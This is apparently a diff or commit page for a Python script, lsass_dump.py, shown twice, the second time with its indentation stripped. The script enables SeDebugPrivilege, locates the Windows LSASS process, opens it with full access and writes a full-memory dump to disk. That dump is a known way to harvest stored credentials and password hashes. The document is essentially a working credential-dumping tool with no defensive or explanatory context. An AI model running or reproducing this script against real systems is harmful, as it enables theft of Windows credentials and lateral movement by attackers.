MohitDabas · October 1, 2024 20:34
diff --git a/lsass_dump.py b/lsass_dump.py
 import win32api
 import win32con
 import win32process
 import win32security
 import win32file  # For CreateFile
 import ctypes
 from ctypes import wintypes
 import os
 import psutil


 # Constants for MiniDumpWriteDump function
 MiniDumpWithFullMemory = 0x00000002
 PROCESS_QUERY_INFORMATION = 0x0400
 PROCESS_VM_READ = 0x0010
 PROCESS_ALL_ACCESS = 0x1F0FFF


 dbghelp = ctypes.windll.dbghelp


 # MiniDumpWriteDump function argument types
 dbghelp.MiniDumpWriteDump.argtypes = [
    wintypes.HANDLE,         # Process handle
    wintypes.DWORD,          # Process ID
    wintypes.HANDLE,         # File handle
    wintypes.DWORD,          # Dump type
    wintypes.LPVOID,         # Exception parameter (can be NULL)
    wintypes.LPVOID,         # User stream parameter (can be NULL)
    wintypes.LPVOID          # Callback parameter (can be NULL)
 ]


 dbghelp.MiniDumpWriteDump.restype = wintypes.BOOL  # Return type is BOOL


 # Enable SeDebugPrivilege to access system processes like LSASS
 def enable_debug_privilege():
    try:
        privilege_name = win32security.LookupPrivilegeValue(None, win32security.SE_DEBUG_NAME)
        token = win32security.OpenProcessToken(win32api.GetCurrentProcess(), win32security.TOKEN_ADJUST_PRIVILEGES | win32security.TOKEN_QUERY)
        win32security.AdjustTokenPrivileges(token, False, [(privilege_name, win32security.SE_PRIVILEGE_ENABLED)])
        print("SeDebugPrivilege enabled.")
    except Exception as e:
        print(f"Failed to enable SeDebugPrivilege: {e}")


 # Function to find LSASS process
 def get_lsass_pid():
    try:
        for proc in psutil.process_iter():
            try:
                if proc.name().lower() == "lsass.exe":
                    print(f"Found LSASS process: PID = {proc.pid}")
                    return proc.pid
            except (psutil.AccessDenied, psutil.NoSuchProcess):
                pass
    except Exception as e:
        print(f"Error accessing processes: {e}")
    return None


 # Function to write a minidump of the LSASS process
 def write_lsass_minidump(output_path):
    pid = get_lsass_pid()
    if not pid:
        print("LSASS process not found.")
        return False
   
    print(f"Found LSASS process with PID: {pid}")


    # Open the LSASS process
    h_process = win32api.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
    if not h_process:
        print(f"Failed to open LSASS process with PID: {pid}")
        return False
   
    # Create a file to write the dump using win32file
    h_file = win32file.CreateFile(
        output_path,
        win32con.GENERIC_WRITE,
        0,
        None,
        win32con.CREATE_ALWAYS,
        win32con.FILE_ATTRIBUTE_NORMAL,
        None
    )
   
    if h_file == win32file.INVALID_HANDLE_VALUE:
        print("Failed to create dump file.")
        return False


    # Ensure the process and file handles are explicitly cast to ctypes-compatible handles
    h_process_ctypes = ctypes.wintypes.HANDLE(int(h_process))
    h_file_ctypes = ctypes.wintypes.HANDLE(int(h_file))


    # Call MiniDumpWriteDump to write the minidump to the file
    success = dbghelp.MiniDumpWriteDump(
        h_process_ctypes,      # Process handle (ctypes HANDLE)
        pid,                   # Process ID (as integer)
        h_file_ctypes,         # File handle (ctypes HANDLE)
        MiniDumpWithFullMemory,  # Dump type
        None,                  # Exception parameter (can be NULL)
        None,                  # User stream parameter (can be NULL)
        None                   # Callback parameter (can be NULL)
    )


    if success:
        print(f"Minidump written successfully to {output_path}")
    else:
        print(f"Failed to write minidump for LSASS. Error: {ctypes.GetLastError()}")


    # Close the file handle
    win32file.CloseHandle(h_file)
   
    # Close the process handle
    win32api.CloseHandle(h_process)
   
    return success


 # Enable SeDebugPrivilege before writing minidump
 enable_debug_privilege()


 # Specify the path for the minidump file
 dump_file_path = os.path.join(os.getcwd(), "lsass.dmp")


 # Write the minidump
 if write_lsass_minidump(dump_file_path):
    print("Minidump operation completed.")
 else:
    print("Minidump operation failed.")
	import win32api
	import win32con
	import win32process
	import win32security
	import win32file # For CreateFile
	import ctypes
	from ctypes import wintypes
	import os
	import psutil


	# Constants for MiniDumpWriteDump function
	MiniDumpWithFullMemory = 0x00000002
	PROCESS_QUERY_INFORMATION = 0x0400
	PROCESS_VM_READ = 0x0010
	PROCESS_ALL_ACCESS = 0x1F0FFF


	dbghelp = ctypes.windll.dbghelp


	# MiniDumpWriteDump function argument types
	dbghelp.MiniDumpWriteDump.argtypes = [
	wintypes.HANDLE, # Process handle
	wintypes.DWORD, # Process ID
	wintypes.HANDLE, # File handle
	wintypes.DWORD, # Dump type
	wintypes.LPVOID, # Exception parameter (can be NULL)
	wintypes.LPVOID, # User stream parameter (can be NULL)
	wintypes.LPVOID # Callback parameter (can be NULL)
	]


	dbghelp.MiniDumpWriteDump.restype = wintypes.BOOL # Return type is BOOL


	# Enable SeDebugPrivilege to access system processes like LSASS
	def enable_debug_privilege():
	try:
	privilege_name = win32security.LookupPrivilegeValue(None, win32security.SE_DEBUG_NAME)
	token = win32security.OpenProcessToken(win32api.GetCurrentProcess(), win32security.TOKEN_ADJUST_PRIVILEGES \| win32security.TOKEN_QUERY)
	win32security.AdjustTokenPrivileges(token, False, [(privilege_name, win32security.SE_PRIVILEGE_ENABLED)])
	print("SeDebugPrivilege enabled.")
	except Exception as e:
	print(f"Failed to enable SeDebugPrivilege: {e}")


	# Function to find LSASS process
	def get_lsass_pid():
	try:
	for proc in psutil.process_iter():
	try:
	if proc.name().lower() == "lsass.exe":
	print(f"Found LSASS process: PID = {proc.pid}")
	return proc.pid
	except (psutil.AccessDenied, psutil.NoSuchProcess):
	pass
	except Exception as e:
	print(f"Error accessing processes: {e}")
	return None


	# Function to write a minidump of the LSASS process
	def write_lsass_minidump(output_path):
	pid = get_lsass_pid()
	if not pid:
	print("LSASS process not found.")
	return False

	print(f"Found LSASS process with PID: {pid}")


	# Open the LSASS process
	h_process = win32api.OpenProcess(PROCESS_ALL_ACCESS, False, pid)
	if not h_process:
	print(f"Failed to open LSASS process with PID: {pid}")
	return False

	# Create a file to write the dump using win32file
	h_file = win32file.CreateFile(
	output_path,
	win32con.GENERIC_WRITE,
	0,
	None,
	win32con.CREATE_ALWAYS,
	win32con.FILE_ATTRIBUTE_NORMAL,
	None
	)

	if h_file == win32file.INVALID_HANDLE_VALUE:
	print("Failed to create dump file.")
	return False


	# Ensure the process and file handles are explicitly cast to ctypes-compatible handles
	h_process_ctypes = ctypes.wintypes.HANDLE(int(h_process))
	h_file_ctypes = ctypes.wintypes.HANDLE(int(h_file))


	# Call MiniDumpWriteDump to write the minidump to the file
	success = dbghelp.MiniDumpWriteDump(
	h_process_ctypes, # Process handle (ctypes HANDLE)
	pid, # Process ID (as integer)
	h_file_ctypes, # File handle (ctypes HANDLE)
	MiniDumpWithFullMemory, # Dump type
	None, # Exception parameter (can be NULL)
	None, # User stream parameter (can be NULL)
	None # Callback parameter (can be NULL)
	)


	if success:
	print(f"Minidump written successfully to {output_path}")
	else:
	print(f"Failed to write minidump for LSASS. Error: {ctypes.GetLastError()}")


	# Close the file handle
	win32file.CloseHandle(h_file)

	# Close the process handle
	win32api.CloseHandle(h_process)

	return success


	# Enable SeDebugPrivilege before writing minidump
	enable_debug_privilege()


	# Specify the path for the minidump file
	dump_file_path = os.path.join(os.getcwd(), "lsass.dmp")


	# Write the minidump
	if write_lsass_minidump(dump_file_path):
	print("Minidump operation completed.")
	else:
	print("Minidump operation failed.")